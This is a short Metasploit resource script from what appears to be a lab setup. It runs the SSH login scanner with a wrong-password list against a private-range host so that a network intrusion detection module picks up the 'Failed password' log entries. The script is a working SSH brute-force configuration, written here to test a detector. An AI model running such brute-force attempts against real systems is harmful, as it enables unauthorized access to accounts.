# Metasploit: SSH login scanner (triggers NIDS brute-force module via journalctl "Failed password").
# Target must be running sshd. Use a deliberate wrong password list against a real account you own,
# or a honeypot user — only test systems you are allowed to attack.
#
#   msfconsole -r /home/kali/Desktop/nids_edit_metasploit/metasploit_lab/ssh_bruteforce.rc
#
# Ensure SSH is up on the victim:  sudo systemctl start ssh

use auxiliary/scanner/ssh/ssh_login
setg RHOSTS 192.168.56.101
set USERNAME kali
set PASS_FILE /home/kali/Desktop/nids_edit_metasploit/metasploit_lab/sample_bad_passwords.txt
set BRUTEFORCE_SPEED 3
set STOP_ON_SUCCESS false
run
